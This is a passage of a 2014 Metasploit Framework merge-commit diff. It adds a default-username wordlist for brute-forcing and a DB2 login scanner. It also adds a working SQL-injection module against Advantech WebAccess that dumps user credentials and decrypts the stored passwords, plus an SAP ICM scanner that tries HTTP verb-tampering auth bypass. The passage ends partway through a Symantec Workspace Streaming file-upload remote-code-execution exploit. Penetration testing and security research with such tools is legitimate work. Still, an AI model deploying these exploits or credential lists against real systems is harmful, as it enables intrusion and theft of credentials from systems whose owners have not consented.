Merge branch 'staging/electro-release' into feature/MSP-9640/cred_creation

bug/bundler_fix
David Maloney 2014-05-20 10:28:33 -05:00
commit 8a2f05b7d2
14 changed files with 4845 additions and 68 deletions

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,915 @@
admin
root
Administrator
sysadm
tech
operator
guest
security
debug
manager
service
!root
user
netman
super
diag
Cisco
Manager
DTA
apc
User
Admin
cablecom
adm
wradmin
netscreen
sa
setup
cmaker
enable
MICRO
login
write
monitor
netopia
op
adminview
sysadmin
echo
craft
maint
comcast
CSG
readonly
manuf
cusadmin
smc
sweex
disttech
su
poll
SYSDBA
anonymous
support
recovery
USERID
eng
administrator
NETWORK
JDE
Guest
rwa
USER
test
lp
ro
MAIL
ami
hsa
system
MGR
ADMINISTRATOR
FIELD
PBX
HELLO
hscroot
1502
superuser
netrangr
readwrite
piranha
wlse
l3
none
naadmin
public
NETOP
MANAGER
demo
D-Link
l2
rw
cgadmin
storwatch
vcr
OPERATOR
MDaemon
jagadmin
enquiry
at4400
davox
PFCUser
aaa
topicalt
admin2
1234
nms
client
sys
field
deskman
SYSADM
superadmin
pmd
GEN2
ADMN
Factory
PRODDTA
tellabs
spcl
dadmin
helpdesk
dhs3mt
install
adfexc
IntraSwitch
manage
superman
SPOOLMAN
ADVMAIL
vt100
PSEAdmin
patrol
teacher
PCUSER
Any
RSBCMON
cellit
inads
halt
locate
TMAR#HWMT8007079
rapport
xbox
device
NICONEX
acc
31994
bcim
websecadm
blue
topicnorm
supervisor
ccrusr
266344
telecom
GEN1
SSA
HTTP
mtch
bciim
browse
hydrasna
deskres
bbsd-client
replicator
intel
radware
intermec
mlusr
init
e250
Polycom
temp1
mac
3comcso
RMUser1
WP
NAU
rcust
mtcl
topicres
bcnas
adminuser
Root
cac_admin
mediator
Anonymous
kermit
volition
GlobalAdmin
LUCENT01
LUCENT02
adminstat
desknorm
IntraStack
e500
deskalt
cust
tiara
bcms
m1122
telco
xd
dhs3pms
VNC
customer
cisco
adminstrator
ftp_nmc
me
iclock
scmadmin
installer
webadmin
ftp_inst
DDIC
SYSTEM
draytek
EARLYWATCH
super.super
ftp_oper
corecess
weblogic
system/manager
End
d.e.b.u.g
target
MD110
tiger
adminttd
wlseuser
SAPCPIC
ftp_admi
default.password
7
2
ADMIN
itsadmin
PUBSUB
CTXSYS
ftp
bill
192.168.1.1
setpriv
GUEST
SAP*
t3admin
hello
CISCO15
1.79
mso
Telecom
qsysopr
APPS
Developer
mail
qsecofr
11111
Service
netadmin
any
db2fenc1
johnson
isp
demos
QSRV
MDSYS
vpasp
TEST
QSECOFR
1
informix
5
engmode
scout
qpgmr
ADSL
images
Gearguy
Demo
serial#
BACKUP
stratacom
6.x
mary
COMPANY
SYS
DSL
Jetform
eagle
ROUTER
ods
siteadmin
Alphanetworks
Admin1
janta
servlet
username
citel
Replicator
SYSMAN
master
SUPERUSER
cn=orcladmin
30
maintainer
BRIO_ADMIN
internal
CQSCHEMAUSER
DEV2000_DEMOS
FSFTASK1
checkfs
USER1
SQLDBA
HELP
toor
qsrvbas
SYSADMIN
EZsetup
BATCH
STRAT_USER
primenet
OEMREP
USER6
lynx
powerdown
$ALOC$
password
VOL-0215
tomcat
REP_MANAGER
WinCCConnect
ALLIN1
DIRMAINT
eqadmin
QSRVBAS
AQJAVA
LASERWRITER
PERFSTAT
apcuser
MBWATCH
system_admin
unix
OWNER
NETPRIV
VSEMAINT
DEMO
SYMPA
REP_OWNER
DCL
FAX
ARCHIVIST
VTAMUSER
VMTAPE
basisk
NetLinx
OutOfBox
NETMGR
DEFAULT
OAS_PUBLIC
read
AP
MTSSYS
SYSMAINT
AUDIOUSER
Joe
IDMS
$SRV
snake
ROOT
PRINTER
shutdown
satan
RDM470
trouble
fax
OP1
admin@example.com
HOST
ADLDEMO
QS_ADM
bin
OPER
oracle
jj
PO7
www
joe
MAINT
CMSBATCH
CCC
role1
DATAMOVE
MSHOME
ISPVM
crowd­-openid-­server
user_editor
sedacm
db2admin
Airaya
SYSDUMP1
IMEDIA
primos_cs
USER_TEMPLATE
pnadmin
lpadmin
VTAM
TRACESVR
POSTMASTER
MAILER
RSCSV2
QS_WS
circ
nobody
Tasman
DISCOVERER_ADMIN
VMASMON
LR-ISDN
TURBINE
GL
PO
PRINT
MODTEST
GATEWAY
PRIMARY
both
haasadm
pw
games
DOCSIS_APP
bbs
EMP
postmaster
SITEMINDER
vgnadmin
RJE
gonzo
NEWS
AQUSER
UTLBSTATU
netbotz
xmi_demo
ORACACHE
MCUser
prash
sync
PM
AP2SVP
ibm
ULTIMATE
SABRE
user_pricer
SUPERVISOR
EVENT
PORTAL30_SSO_PS
FSFADMIN
OO
WKSYS
OPERATNS
UVPIM_
OE
OCITEST
web
ESSEX
None
CTXDEMO
user_designer
QDBA
role
LRISDN
tele
WEBCAL01
rsadmin
OMWB_EMULATION
WINDOWS_PASSTHRU
MOREAU
fast
host
ORDPLUGINS
SYSWRM
savelogs
SDOS_ICSAP
DSSYS
MGWUSER
TDOS_ICSAP
ssp
EJSADMIN
INGRES
DS
estheralastruey
VCSRV
ssladmin
CLARK
OEMADM
restoreonly
quser
MILLER
trmcnfg
REPORT
user_author
dpn
tour
mountfsys
http
PROG
openfiler
RAID
STARTER
FAXUSER
DSA
daemon
mountsys
backuponly
IVPM1
USER3
OPENSPIRIT
prime
HPLASER
CSPUSER
qsvr
SYSCKP
Sysop
user_marketer
IMAGEUSER
bsxuser
MASTER
USER9
OLAPSYS
rje
ODM_MTR
QS_ES
lansweeperuser
DEMO3
Username
GPLD
uucp
DBSNMP
VMARCH
SWUSER
Operator
CHEY_ARCHSVR
roo
n.a
accounting
backuprestore
dni
WEBADM
iceman
guru
anon
USER8
PORTAL30_SSO_PUBLIC
postgres
WINSABRE
USERP
IVPM2
PORTAL30_SSO
ALLIN1MAIL
POST
TEMP
BATCH1
PROMAIL
SECDEMO
ARAdmin
sadmin
ORAREGSYS
VMASSYS
man
FROSTY
LASER
tutor
DISKCNT
default
SYSERR
WWW
VAX
PROCAL
FAXWORKS
LDAP_Anonymous
(any
setup/snmp
DSGATEWAY
AWARD_SW
CSMIG
umountfsys
VMS
bpel
viewuser
TDISK
politically
user_analyst
RSCS
COMPIERE
OSP22
guest1
FORSE
factory
bubba
QUSER
primeos
glftpd
RMAN
mountfs
DIRECT
firstsite
IPFSERV
TSUSER
BATCH2
snmp
WebAdmin
IBMUSER
SMART
voadmin
BC4J
core
OPERVAX
Bobo
WANGTEK
OWA
USER2
jasperadmin
VMBSYSAD
PVM
ctb_admin
 
DEMO4
qsrv
superdba
PORTAL30
XPRT
Crowd
18364
ilom-admin
rdc123
sysopr
tasman
blank
WEBREAD
ODM
11111111
AURORA$ORB$UNAUTHENTICATED
ADAMS
Craft
rfmngr
SYSTEST_CLIG
user_approver
ilom-operator
Nice-admin
answer
NETNONPRIV
nuucp
CIDS
VASTEST
redline
MBMANAGER
webmaster
APPLSYS
USER4
hqadmin
UOMNI_
VMUTIL
uucpadm
EXFSYS
4Dgifts
JMUSER
CIS
UNITY_
HLW
pwrchute
IDMSSE
NSA
TELEDEMO
recover
TRAVEL
lexar
viewer
LIBRARY
PO8
root@localhost
NAMES
secofr
PDMREMI
MGE
USER7
OWA_PUBLIC
questra
builtin
SFCNTRL
boss
PLEX
OLAPDBA
OLAPSVR
user_expert
Bhosda
gropher
TAHITI
NEWINGRES
VM3812
VIF_DEVELOPER
joeuser
IPC
HELPDESK
wlpisystem
TSAFVM
prtgadmin
UAMIS_
theman
CISINFO
mobile
QS_CB
CDEMORID
DEMO2
PORTAL30_PUBLIC
MDDEMO_CLERK
PHANTOM
ODS
BLAKE
TSDEV
PRODBM
dos
APL2PP
god1
CICSUSER
22222222
user_publisher
OSE$HTTP$ADMIN
def
SuperUser
QS_CBADM
SYSA
STUDENT
Draytek
SMDR
EREP
VSEMAN
fwadmin
MTS_USER
AQDEMO
private
IS_$hostname
HPSupport
ORASSO
CVIEW
SH
XXSESS_MGRYY
VMMAP
PORTAL30_DEMO
Ezsetup
QS_CS
CMSUSER
DEMO1
userNotUsed
ncadmin
TESTPILOT
fg_sysadmin
UETP
QS
DBI
JWARD
APPS_MRC
Moe
SENTINEL
Yak
PDP11
Flo
SLIDE
INFO
checkfsys
PRODCICS
MXAGENT
VMTLIBR
POWERCARTUSER
VMBACKUP
CPNUC
distrib
MIGRATE
CDEMOUCB
OLTSEP
sysbin
signa
autocad
WEBDB
ncrm
SAMPLE
HCPARK
ALLINONE
nm2user
SAVSYS
IIPS
PATROL
mailadmin
TMSADM
ESubscriber
software
god2
FSFTASK2
ORDSYS
gopher
PSFMAINT
EAdmin
12345
DECNET
OPERATIONS
$system
PANAMA
LIBRARIAN
fal
NETSERVER
POWERCHUTE
USER5
GPFD
QS_OS
REPADMIN
0
DEMO8
DEMO9
CDEMO82
umountsys
USER0
CDEMOCOR
SYSTEST
Rodopi
user_checker
qserv
AQ
SAPR3
VRR1
fastwire
admi
FINANCE
WinCCAdmin
ESTOREUSER
VIRUSER
LINK
APPLSYSPUB
overseer
checksys
umountfs
DBDCCICS
TOAD
ntpupdate
MDDEMO_MGR
billy-bob
DECMAIL
alien
nsroot
AdvWebadmin
dvstation
SERVICECONSUMER1
MMO2
NOC
WWWUSER
SAP
NEVIEW
ODSCOMMON
pixadmin
ripeop
PENG
netlink
L2LDEMO
OUTLN
12.x
scott
dbase
fam
Oper
RMAIL
FND
PRIV
SETUP
news
VSEIPO
ilon
PLSQL
politcally
18140815
APPUSER
CENTRA
LBACSYS
PDP8
SFCMI
lpadm
Test
bewan
DIP
mfd
MDDEMO
SWPRO
DES
Coco
GCS
rodopi
Scott
Admin5
ANDY
DESQUETOP
NETCON
JONES
author
MOESERV
PUBSUB1
CATALOG
SQLUSER
RE
REPORTS_USER
MFG
HR
VIDEOUSER
DBA
AUTOLOG1
AURORA$JIS$UTILITY$
wlcsystem
CPRM

View File

@ -0,0 +1,123 @@
require 'metasploit/framework/tcp/client'
require 'metasploit/framework/login_scanner/base'
require 'metasploit/framework/login_scanner/rex_socket'
module Metasploit
module Framework
module LoginScanner
# This is the LoginScanner class for dealing with DB2 Database servers.
# It is responsible for taking a single target, and a list of credentials
# and attempting them. It then saves the results.
class DB2
include Metasploit::Framework::LoginScanner::Base
include Metasploit::Framework::LoginScanner::RexSocket
include Metasploit::Framework::Tcp::Client
# @see Base#attempt_login
def attempt_login(credential)
result_options = {
credential: credential
}
begin
probe_data = send_probe(credential.realm)
if probe_data.empty?
result_options[:status] = :connection_error
else
if authenticate?(credential)
result_options[:status] = :success
else
result_options[:status] = :failed
end
end
rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout, ::Rex::Proto::DRDA::RespError,::Timeout::Error => e
result_options.merge!({
status: :connection_error,
proof: e.message
})
end
::Metasploit::Framework::LoginScanner::Result.new(result_options)
end
private
# This method takes the credential and actually attempts the authentication
# @param credential [Credential] The Credential object to authenticate with.
# @return [Boolean] Whether the authentication was successful
def authenticate?(credential)
# Send the login packet and get a response packet back
login_packet = Rex::Proto::DRDA::Utils.client_auth(:dbname => credential.realm,
:dbuser => credential.public,
:dbpass => credential.private
)
sock.put login_packet
response = sock.get_once
if valid_response?(response)
if successful_login?(response)
true
else
false
end
else
false
end
end
# This method opens a socket to the target DB2 server.
# It then sends a client probe on that socket to get information
# back on the server.
# @param database_name [String] The name of the database to probe
# @return [Hash] A hash containing the server information from the probe reply
def send_probe(database_name)
disconnect if self.sock
connect
probe_packet = Rex::Proto::DRDA::Utils.client_probe(database_name)
sock.put probe_packet
response = sock.get_once
response_data = {}
if valid_response?(response)
packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response)
response_data = Rex::Proto::DRDA::Utils.server_packet_info(packet)
end
response_data
end
# This method sets the sane defaults for things
# like timeouts and TCP evasion options
def set_sane_defaults
self.max_send_size ||= 0
self.send_delay ||= 0
self.ssl ||= false
end
# This method takes a response packet and checks to see
# if the authentication was actually successful.
#
# @param response [String] The unprocessed response packet
# @return [Boolean] Whether the authentication was successful
def successful_login?(response)
packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response)
packet_info = Rex::Proto::DRDA::Utils.server_packet_info(packet)
if packet_info[:db_login_success]
true
else
false
end
end
# This method provides a simple test on whether the response
# packet was valid.
#
# @param response [String] The response to examine from the socket
# @return [Boolean] Whether the response is valid
def valid_response?(response)
response && response.length > 0
end
end
end
end
end

View File

@ -480,7 +480,7 @@ class Client
opts['headers']||= {}
ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options)
workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
workstation_name = Rex::Text.rand_text_alpha(rand(8)+6)
domain_name = self.config['domain']
b64_blob = Rex::Text::encode_base64(

View File

@ -0,0 +1,299 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech WebAccess SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The
vulnerability exists in the DBVisitor.dll component, and can be abused through malicious
requests to the ChartThemeConfig web service. This module can be used to extract the site
and project usernames and hashes.
},
'References' =>
[
[ 'CVE', '2014-0763' ],
[ 'ZDI', '14-077' ],
[ 'OSVDB', '105572' ],
[ 'BID', '66740' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ]
],
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Apr 08 2014"
))
register_options(
[
OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']),
OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"])
], self.class)
end
def build_soap(injection)
xml = Document.new
xml.add_element(
"s:Envelope",
{
'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/"
})
xml.root.add_element("s:Body")
body = xml.root.elements[1]
body.add_element(
"GetThemeNameList",
{
'xmlns' => "http://tempuri.org/"
})
name_list = body.elements[1]
name_list.add_element("userName")
name_list.elements['userName'].text = injection
xml.to_s
end
def do_sqli(injection, mark)
xml = build_soap(injection)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"),
'ctype' => 'text/xml; charset=UTF-8',
'headers' => {
'SOAPAction' => '"http://tempuri.org/IChartThemeConfig/GetThemeNameList"'
},
'data' => xml
})
unless res && res.code == 200 && res.body && res.body.include?(mark)
return nil
end
res.body.to_s
end
def check
mark = Rex::Text.rand_text_alpha(8 + rand(5))
injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
data = do_sqli(injection, mark)
if data.nil?
return Msf::Exploit::CheckCode::Safe
end
Msf::Exploit::CheckCode::Vulnerable
end
def parse_users(xml, mark, separator)
doc = Document.new(xml)
strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text)
strings_length = strings.length
unless strings_length > 1
return
end
i = 0
strings.each do |result|
next if result == mark
@users << result.split(separator)
i = i + 1
end
end
def run
print_status("#{peer} - Exploiting sqli to extract users information...")
mark = Rex::Text.rand_text_alpha(8 + rand(5))
rand = Rex::Text.rand_text_numeric(2)
separator = Rex::Text.rand_text_alpha(5 + rand(5))
# While installing I can only configure an Access backend, but
# according to documentation other backends are supported. This
# injection should be compatible, hopefully, with most backends.
injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} "
injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
data = do_sqli(injection, mark)
if data.blank?
print_error("#{peer} - Error exploiting sqli")
return
end
@users = []
@plain_passwords = []
print_status("#{peer} - Parsing extracted data...")
parse_users(data, mark, separator)
if @users.empty?
print_error("#{peer} - Users not found")
return
else
print_good("#{peer} - #{@users.length} users found!")
end
users_table = Rex::Ui::Text::Table.new(
'Header' => 'Advantech WebAccess Users',
'Ident' => 1,
'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin']
)
for i in 0..@users.length - 1
@plain_passwords[i] =
begin
decrypt_password(@users[i][1], @users[i][2])
rescue
"(format not recognized)"
end
@plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty?
begin
@plain_passwords[i].encode("ISO-8859-1").to_s
rescue Encoding::UndefinedConversionError
chars = @plain_passwords[i].unpack("C*")
@plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}"
@plain_passwords[i] << " (ISO-8859-1 hex chars)"
end
report_auth_info({
:host => rhost,
:port => rport,
:user => @users[i][0],
:pass => @plain_passwords[i],
:type => "password",
:sname => (ssl ? "https" : "http"),
:proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}"
})
users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])]
end
print_line(users_table.to_s)
end
def user_type(database)
user_type = database
unless database == "BAUser"
user_type << " (Web Access)"
end
user_type
end
def decrypt_password(password, key)
recovered_password = recover_password(password)
recovered_key = recover_key(key)
recovered_bytes = decrypt_bytes(recovered_password, recovered_key)
password = []
recovered_bytes.each { |b|
if b == 0
break
else
password.push(b)
end
}
return password.pack("C*")
end
def recover_password(password)
bytes = password.unpack("C*")
recovered = []
i = 0
j = 0
while i < 16
low = bytes[i]
if low < 0x41
low = low - 0x30
else
low = low - 0x37
end
low = low * 16
high = bytes[i+1]
if high < 0x41
high = high - 0x30
else
high = high - 0x37
end
recovered_byte = low + high
recovered[j] = recovered_byte
i = i + 2
j = j + 1
end
recovered
end
def recover_key(key)
bytes = key.unpack("C*")
recovered = 0
bytes[0, 8].each { |b|
recovered = recovered * 16
if b < 0x41
byte_weight = b - 0x30
else
byte_weight = b - 0x37
end
recovered = recovered + byte_weight
}
recovered
end
def decrypt_bytes(bytes, key)
result = []
xor_table = [0xaa, 0xa5, 0x5a, 0x55]
key_copy = key
for i in 0..7
byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff)
result.push(byte ^ xor_table[key_copy & 3])
key_copy = key_copy / 4
key = key / 8
end
result
end
def crazy(byte, magic)
result = byte & 0xff
while magic > 0
result = result * 2
if result & 0x100 == 0x100
result = result + 1
end
magic = magic - 1
end
result
end
end

View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@ -30,62 +29,43 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]),
OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
OptPath.new('URLFILE', [true, "SAP ICM Paths File",
File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')])
], self.class)
end
# Base Structure of module borrowed from jboss_vulnscan
def run_host(ip)
# If URLFILE is set empty, obviously the user made a silly mistake
if datastore['URLFILE'].empty?
print_error("Please specify a URLFILE")
return
end
# Initialize the actual URLFILE path
if datastore['URLFILE'] == "sap_icm_paths.txt"
url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
else
# Not the default sap_icm_paths file
url_file = datastore['URLFILE']
end
# If URLFILE path doesn't exist, no point to continue the rest of the script
if not File.exists?(url_file)
print_error("Required URL list #{url_file} was not found")
return
end
res = send_request_cgi(
res = send_request_cgi(
{
'uri' => "/" + Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
})
if res
print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
@info = []
if not res.headers['Server'].nil?
if res.headers['Server']
@info << res.headers['Server']
print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
else
print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
end
if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) )
print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
end
# Load URLs
urls_to_check = []
File.open(url_file) do |f|
urls_to_check = check_urlprefixes
File.open(datastore['URLFILE']) do |f|
f.each_line do |line|
urls_to_check.push line
end
end
print_status("#{rhost}:#{rport} Beginning URL check")
@valid_urls = ''
urls_to_check.each do |url|
check_url(url.strip)
end
@ -93,59 +73,116 @@ class Metasploit3 < Msf::Auxiliary
print_error("#{rhost}:#{rport} No response received")
end
if @valid_urls.length > 0
l = store_loot(
'sap.icm.urls',
"text/plain",
datastore['RHOST'],
@valid_urls,
"icm_urls.txt", "SAP ICM Urls"
)
print_line
print_good("Stored urls as loot: #{l}") if l
end
end
def check_url(url)
full_url = write_url(url)
res = send_request_cgi({
'uri' => url,
'uri' => normalize_uri(url),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
})
if (res)
if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
if res.headers['Server']
unless @info.include?(res.headers['Server'])
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
end
end
case
when res.code == 200
print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
when res.code == 403
print_good("#{rhost}:#{rport} #{url} - restricted (403)")
when res.code == 401
print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
case res.code
when 200
print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})")
@valid_urls << full_url << "\n"
when 403
print_status("#{full_url} - restricted (#{res.code})")
when 401
print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}")
@valid_urls << full_url << "\n"
# Attempt verb tampering bypass
bypass_auth(url)
when res.code == 404
when 404
# Do not return by default, only display in verbose mode
vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
when res.code == 500
print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
when res.code == 301, res.code == 302
print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
vprint_status("#{full_url} - not found (#{res.code})")
when 400, 500
print_status("#{full_url} - produced a server error (#{res.code})")
when 301, 302
print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
@valid_urls << full_url << "\n"
when 307
print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
else
vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
print_error("#{full_url} - unhandled response code #{res.code}")
@valid_urls << full_url << "\n"
end
else
print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
vprint_status("#{full_url} - not found (No Repsonse code Received)")
end
end
def write_url(path)
if datastore['SSL']
protocol = 'https://'
else
protocol = 'http://'
end
"#{protocol}#{rhost}:#{rport}#{path}"
end
def bypass_auth(url)
print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
full_url = write_url(url)
vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})")
res = send_request_raw({
'uri' => url,
'uri' => normalize_uri(url),
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
}, 20)
})
if (res and res.code == 200)
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
if (res && res.code == 200)
print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
# "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS.
# This is how the message server finds out which URLs must be forwarded where.
# (SAP help) -> this disclose custom URLs that are also checked for authentication
def check_urlprefixes
urls = []
res = send_request_cgi({
'uri' => "/sap/public/icf_info/urlprefix",
'method' => 'GET',
})
if (res && res.code == 200)
res.body.each_line do |line|
if line =~ /PREFIX=/
url_enc = line.sub(/^PREFIX=/, '')
# Remove CASE and VHOST
url_enc = url_enc.sub(/&CASE=.*/, '')
url_dec = URI.unescape(url_enc).sub(/;/, '')
urls << url_dec.strip
end
end
else
print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
end
urls
end
end

View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
row.each { |val| @hashes << val.value.to_s }
end
print_good("#{ip} Found Users & Password Hashes:")
print_good("#{ip} - Found user and password hashes:")
end
credinfo = ""
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end

View File

@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end

View File

@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end

View File

@ -0,0 +1,356 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Workspace Streaming Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Symantec Workspace Streaming. The
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
as_agent.exe service, which allows for uploading arbitrary files under the server root.
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
to achieve remote code execution. This module has been tested successfully on Symantec
Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
machine deployment, and also in the backend role in a multiple machine deployment.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-1649'],
['BID', '67189'],
['ZDI', '14-127'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 12 2014'))
register_options(
[
Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
], self.class)
end
def send_xml_rpc_request(xml)
res = send_request_cgi(
{
'uri' => normalize_uri("/", "xmlrpc"),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => xml
})
res
end
def build_soap_get_file(file_path)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.getFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file_name = params.add_element("param")
value_file_name = param_file_name.add_element("value")
value_file_name.text = file_path
param_file_binary = params.add_element("param")
value_file_binary = param_file_binary.add_element("value")
type_file_binary = value_file_binary.add_element("boolean")
type_file_binary.text = "0"
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_put_file(file)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file = params.add_element("param")
value_file = param_file.add_element("value")
type_value_file = value_file.add_element("ex:serializable")
type_value_file.text = file
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_check_put
xml = Document.new
xml.add_element(
"methodCall",
{
